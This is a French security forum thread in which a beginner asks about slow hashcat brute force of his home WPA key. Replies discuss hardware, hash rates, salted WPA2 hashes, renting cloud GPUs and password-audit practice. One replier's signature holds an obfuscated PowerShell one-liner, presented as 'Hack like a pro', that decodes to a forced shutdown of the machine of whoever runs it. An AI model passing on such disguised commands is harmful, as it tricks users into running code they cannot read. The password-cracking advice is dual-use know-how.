Annonce

Réduire
Aucune annonce.

Salut la communauté , confirmez moi une chose svp .

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Salut la communauté , confirmez moi une chose svp .

    Salut la communauté .

    Je viens vers vous car , j'ai un doute que je voudrais clarifier une fois pour toute svp .

    Voilà je suis conscient des limites de ma config niveau puissance de calcule . Ma config : GPU Nvidia GTX 460
    CPU Intel i5 750 ( 2.6 ghz ) ( 4gb de ram , asus p7p55d

    Lorsque je fais une attaque avec hashcat sur le WPA de la maison , en facilitant le calcule en mettant uniquement ?H?H?H?H?H?H?H?H?H?H?H? ( 11 Caractères . ) dans le dico . ( mdp d'origine . 11 ou 12 caractere je sais plus . )
    Est-ce bien normale d'arriver a 30J de calcule ? D'estimation ? ( J'ai bien essayé par exemple de remplir le dico avec ma clé WPA en laissant ( sur les 11 caractère de mon mdp ) , seulement 1 caractere a calculer .
    Là il me le trouve illico . ¨Pas de soucis . Mais il suffit que j'augmente légèrement les combinaison , pour qu'il peine a bosser rapidement .

    De plus , impossible d'utiliser oclhashcat , ni pyrit car je suis dans l'impossibilité d'utilisé ma carte graphique , car elle n'a pas de driver compatible avec . Opencl ou autre n'y change rien. j'ai bien mon driver nvidia , avec un bon affichage mais impossible de l'utiliser avec opencl ou CUDA . Ou alors j'ai mal fait quelque chose quelque part , cela ne m'étonnerait pas . Tout est possible .

    J'en conclu que mon pc a vraiment besoin de toute urgence d'une nouvelle santé , c'est bien ça les amis ?

    Être a jours , en possedant les dernière / avant dernière carte graphique / CPU , changerait vraiment tout niveau calcule les gars ?

    Merci d'avance . Je sais que je pourrais peut être évité de poster cela ici , pouvant trouver ma réponse ailleurs , mais j'ai voulu profité de mon petit questionnement , pour discuter avec la communauté hackademics !

    Merci encore .

    Ps : Nvidia ou amd ? Linux = Amd en générale non ?


  • #2
    Bonjour,

    Je ne voudrais pas laisser un tel enthousiasme sans réponse. Bienvenu, déjà.

    Je te confirme que ton PC est plus que dépassé. Après, je ne saurais dire à quel point cela affecte les performances de ces logiciels mais ça les affecte certainement.

    Si tu veux briller sur ce genre d'application, je pense qu'il te faut un processeur récent et beaucoup de mémoire vive (16 GiO me paraît un minimum).

    Une carte graphique survitaminée te donnerait certainement encore plus de puissance mais c'est très cher et la prise en charge de la carte n'est jamais garantie.

    Linux, comme tout SE, tourne très bien avec AMD ou avec Intel. C'est une question de puissance / prix et de particularités qui font qu'on aime ou qu'on n'aime pas l'un ou l'autre.

    En bref, choisis d'abord ton processeur, puis ta carte mère. Mets-y un maximum de mémoire vive, la plus rapide possible. Quant à la carte graphique, personnellement, je trouve que c'est trop cher pour ce que c'est, à moins que tu ne veuilles aussi miner ou jouer aux derniers jeux à la mode.

    PS : il n'y a pas de 'e' final ni à calcul ni à "en général".

    Commentaire


    • #3
      Coucou Icarus

      Merci d'avoir pris de ton temps mec , c'est vraiment sympas . Merci pour l'acceuil
      OK pour le Cpu pour la ram , tu penses que la puissance de calcule ( rhaa , pas de "e" à calcul je note merci ca m'a permi de me faire un ptit rappel , calcule = verbe , calcul = nom commun ) est liée aussi a la ram ? ( De loin alors ? ) Bien que ca va de soit de mettre le max de mémoire vive si je refais une news config vue le prix de la ram ainsi que des performances obtenues avec autant de ram . C'est juste pour savoir , si tu sais , je veux bien que tu me dis vite fait, merci d'avance

      Une carte graphique survitaminée te donnerait certainement encore plus de puissance mais c'est très cher et la prise en charge de la carte n'est jamais garantie
      Je ne peux que plussoyer , moi qui est tout le temps des blacks screens à chaques installations d'os sous linux à cause des drivers propriétaires d'Nvidia .
      D'ou ma question plus bas de " amd ou nvidia " . C'est vrai que c'est pas facile , bien qu'il y est des sites qui référencent celles qui fonctionnes , amd ou nvidia confondu , ca reste pas facile , mais je ferais attention avec l'aide de ces sites . J'avais pensé que les logiciels comme cuda , oclhashcat et pyrit aimaient plus jouer avec nvidia que amd ( c'est juste ce que je pense , par à port a ce que j'ai lu sur les forums . )

      Linux, comme tout SE, tourne très bien avec AMD ou avec Intel. C'est une question de puissance / prix et de particularités qui font qu'on aime ou qu'on n'aime pas l'un ou l'autre.
      Ok , J'ai déjà fait l'expérience avec intel , je pense passer chez amd leurs driver sont libre ? :x question qui m'est venu en cour d'écriture . Marre de la télémetrie . ( marche po sur linux ils disent mais je suis sur que si )

      Je voulais te demander , Est-ce que les logiciels comme hashcat peuvent utiliser le cpu + le gpu en même temps lors d'une attaque ? si c'est l cas alors acheter une bonne CG serait top , sachant que j'aime aussi miner et jouer , ( tu as vue juste ) ca serait une sacré bonne intégration à la futur config donc à voir . Bien que je ne minerais pas avec cette cg , je jouerais / pentesterais surement . Mais une config dédié au minage est quand même plus sympatoche , moins prise de bec mais oui , beaucoups plus couteuse .

      Merci encore d'avoir éclairé un neophyte comme moi .

      Ps : J'ai une dernière question un peut ( beaucoup ) hs avec le topic . dsl , je profite un peut .. Tu as un liens par hazard qui explique l'autre façon pour trouver la clé WPA ? Si j'ai bien compris , il y'a deux methode pour WPA . Brute force , et une deuxieme methode avec "tableau de hashage " c'est la seule info que j'ai étant déjà nul en francais comme tu as pu le voir , je te laisse imaginé l'anglais , j'ai pas reussi à trouver l'info en anglais . Mais je n'ai pas cherché à fond comme je le fais d'habitude , car j'etais un peut deg que le pc puisse pas faire ce que je veux . ( En effet , quand tu fais un brute force WPA avec hashcat et que tu vois "Temps estimé = Prochain big bang ... bon , j'ai bien rigolé quand même , magnifique leur humour .) Donc je profite ici pour te demander ça . je suis tomber 4-5 fois dessus mais j'accordais plus d'importance au brute force . J'ai eu tord . Je retrouve plus les liens .


      Sinon tkt , je retrouverai ça lorsque je reprendrai serieusement les cours en sécu ,quand j'aurais un pc performant . là je préfère resté sur le réseau /programmation .

      PS2 : Derni-Dernière chose : J'ai lu qu'il n'est pas nécéssaire d'avoir un bon pc pour se débrouiller dans le pentest A PART POUR FAIRE DU BRUTEFORCE SUR WPA ??? D'ou mon premier P.S car apparement , le brute force pour le wpa n'est pas la seule option . Et l'action la plus gourmande en pentest est bien le brute force si j'ai compris . Alors est -ce vrai qu'un thinkpad de base , allé , je vais caricaturé a fond , est -ce vrai que mon Acer Intel Pentium P6100 Dualcore 2Ghz CPU, 2GB DDR3 RAM, suffirait a faire du pentest si je peux contourner le moyens le plus gourmand d'arriver a ma fin ?car j'ai lu ici et là que les thinkpads ça suffit pour du pentest . Mais j'y crois trés peut . Qu'en pensez-vous ?

      Rhaa , moi qui ne voulais pas écrire un livre ...


      Sincèrement , Neo_phyt3
      Dernière modification par Neo_phyt3, 05 novembre 2021, 08h08.

      Commentaire


      • #4
        Salut, bienvenue !

        De manière générale, les scénarios de bruteforce avec "l'ordi de la maison" en 2021 c'est peine perdue ou presque. Tout le monde a à peu près capté qu'un mdp de 10 caractères est un minimum. Et pour cracker des clés WPA2, c'est encore pire : même si techniquement la longueur de clé mini est de 8 char ASCII, les routeurs et autres "box" imposent une longueur minimal qui tournent souvent autour de 15. De plus, le hashrate sur du bruteforce de clé WPA2 tourne autour de 758700 hash/s avec une RTX 2080, ce qui reste extremement fastidieux avec une carte à 1500€.

        Tout ça pour dire que si ta CG ne sert qu'a bruteforcer, autant partire sur une instance amazon EC2 avec un gros GPU, et Hashcat installé dessus. Ou pour les flemmard, ya même des sites qui font tout pour toi : https://www.onlinehashcrack.com/
        Donc bruteforce via une wordlist bien triée à la recherche d'un "quick-win", pourquoi pas. Full bruteforce, faut s'équiper autrement.

        Puis, pour tes questions :
        Hashcat permet de parrallèliser le calcul via CPU ET GPU. Mais le CPU est tellement à l'ouest sur ce type d'exercice que la question de ll'interêt se pose. Tu peux essayer --benchmark, tu verras

        PS1 : Bruteforce via rainbow table (ce que tu semble appeler "tableau de hashage) sur du WiFi c'est un peu mort, WPA2 utilise un salt (le SSID de l'AP) qui fait que tu n'as pas une correspondance unique "clé hashée "-> "clé en clair" dans le monde entier (et donc ya potentiellement des rainbow table sur des SSID "par défaut" de constructeur, mais qui les rendent dynamiques depuis longtemps).
        Par conséquent, la méthode utilisée, c'est, à la volée, pour chaque ligne de ton dico / tentative : "mot de ton dic" -> "hashage via PBKDF2 + salt(SSID)" -> comparaison du résultat avec le hash à bruteforcer. Si ça march, alors "mot de ton dic" est le bon. Et ce, quelques centaines de millier de fois par secondes avec une carte pas trop naze.

        PS2 : Un PC de base est très sufisant. Comme dit plus haut, on ne bruteforce pas sur un "PC de pentest", c'est pas fait pour. Un thinkpad chopé 400€ sur le bon coin ferra parfaitement l'affaire.
        Hack like a pro :
        PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

        Commentaire


        • #5
          Salut Krisscool .
          Merci pour cette élucidation . Tu as réussis , en une fois , à répondre à tous ce qui me préocupait , en me donnant même plus d'info que j'en attendais . Magnifique .
          Avec le benchmark à peu près mon h/s est de 3283 H/s avec le mode 2200 (Hashmode: 22000 - WPA-PBKDF2-PMKID+EAPOL (Iterations: 4095) Cpu I5 750 2.67 Ghz )
          Ahahaha 22 fois moins puissants qu'une Rtx 2080 à-peu-près . Quand même nan ? . N'yant aucunes références sur les H/s à obtenir pour du pentest je ne sais pas si une rtx est bonne ou pas pour le pentest ( je sais juste que c 22 fois mieux que ma config actuel ) . Si tu me dis " pas trop intéréssant / rentable , pour le prix " c'est que c'est vraiment pas intéréssant . Merci , j pensais que cela suffirait de prendre une rtx en remplacement de mon cpu au bord de la crise cardiaque , je pensais que ca changerais énormément . Mais non en faite. Il faut vraiment une série de cpu / gpu en série pour une bonne puissance de calcul . Un peut comme le minage , mais pour du pentest c'est bien ça si j'ai un peut compris ce que tu m'as dit ?

          PS1 = EXACTEMENT CA !!! MILE MERCI . C'est bien " rainbow table" t'es de la bombe <3 .
          => Question ,du coup , ca veut dire que le Wpa fonctionne essentiellement au brute force ? ( Même si ce n'est pas le seule moyen pour arrivé à obtenir la clé . comme les screens savers et autre mais qui demande un accès physique à la machine .. C'est quand même plus cool d'y avoir un accès à distance . Breff , comme je suis vraiment à mes début , je rentre pas trop dans ce sujet , en fin , j'y sors tout de suite plutôt . )

          Pour le "instance amazon EC2 avec un gros GPU," je connaissais pas ... MAIS CA A L'AIR N R V !! https://aws.amazon.com/fr/ec2/instance-types/ tu fais comment , tu te co en ssh sur leurs supermachines et tu l'utilise comme tu veux ? Merci pour le lien des SSID par défaut , c'est sympas , je mets ça de coté . Je ne connaissais pas . Je verrais ça tout a l'heure en rentrant , je suis venu avant d'aller au boulot voir la réponse , je paufinerais tout cela tout à l'heure en rentrant .

          Pour ton PS2 qui résume bien le tout . C'est noté . Il me faut juste énormément de mémoir vive ( pour faire un labo par exemble ) pour pouvoir apprendre le pentest en paix , c'est ça l'ami ? Merci encore c'est frenchement sympas les gars d'échanger avec un néophyte comme moi .

          Edit : Bonne journée les amis , à tout à l'heure .
          Dernière modification par Neo_phyt3, 05 novembre 2021, 08h04.

          Commentaire


          • #6
            3283 H/s VS 758700 H/s ça Fait plutôt 231 fois plus rapide ^^ Mais même ça, ça reste assez peu pour être utilisé régulièrement, dans des vrais scénarios réalistes.
            Disons que ça te permetra quand même de faire tomber les mdp les plus triviaux d'une liste en un temps assez raisonable. La posture en générale, c'est de lancer le bruteforce sur une liste de hash (récupupérés dans une BDD que tu as poncé par ailleurs), ou les hash NTLM qui sortent d'un ntds.dit, et de voir ce qui tombe en moins de 24h pour faire un audit de la robustesse de la politique de mot de passe d'une appli / AD.

            Après un pentest est fait pour découvrir des vulnérabilités. Un mot de passe que tu mets 4 mois à casser avec un matos dédié qui coute des 10ène de K€ ne sera une vulnérabilité pour toi que si tu rentre dans le viseur de threat actor étatiques ou assimilés.
            Mais coté red team très honnetement, quand on en arrive à ça, faut raisonner logiquement : la porte est blindée, quelles sont les autres ouvertures ? Et rien que pour récup un mdp, tu peux tout simplement, passer par une campagne de phishing bien foutue. Ca t'économisera des mois et des k€.

            Les EC2 AWS c'est ça oui, SSH ou ce que tu veux d'ailleurs (btw plutôt SSH si c'est une machine linux), et tu payes aux temps CPU / GPU. Donc pour un truc bien ciblé, ça peut le faire.

            Sinon +1 pour 16 Go de RAM et 512Go de stockage mini si tu veux faire tourner des labs en local.
            Sinon ya aussi https://www.hackthebox.com/
            Hack like a pro :
            PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

            Commentaire


            • #7
              Salut Krisscool ,

              3283 H/s VS 758700 H/s ça Fait plutôt 231 fois plus rapide ^^[...]
              Désolé je sais pas comment je suis arrivé a " 22 fois " r . Je mets ça sur le coup de la fatigue .

              Disons que ça te permetra quand même de faire tombé les mdp les plus triviaux d'une liste en un temps assez raisonable. La posture en générale, c'est de lancer le bruteforce sur une liste de hash [...]et de voir ce qui tombe en moins de 24h pour faire un audit de la robustesse de la politique de mot de passe d'une appli / AD.
              C'est ce que je me disais .

              Après un pentest est fait pour découvrir des vulnérabilités.Un mot de passe que tu mets 4 mois à casser(...]
              là aussi je suis d'accords , un pentest est simplement fait pour tester la robustesse . Si par exemple j'arrive a rien avec une bonne 2080 sur un wpa2 en 24h , je peux + ou - dire que mon mdp est + ou - robuste . ( Grossomodo )

              Les EC2 AWS c'est ça oui, SSH ou ce que tu veux d'ailleurs (btw plutôt SSH si c'est une machine linux), et tu payes aux temps CPU / GPU. Donc pour un truc bien ciblé, ça peut le faire.
              Vraiment top ça .

              Sinon +1 pour 16 Go de RAM et 512Go de stockage mini si tu veux faire tourner des labs en local.
              Sinon ya aussi https://www.hackthebox.com/
              ok pour le labs , hackthebox j'en ai entendu parlé mais pas encore test . Je mets tes liens de cotés .

              Mille merci en tout cas pour le soutient , c'est trés trés sympas . Prends soin de toi .


              Commentaire

              Chargement...
              X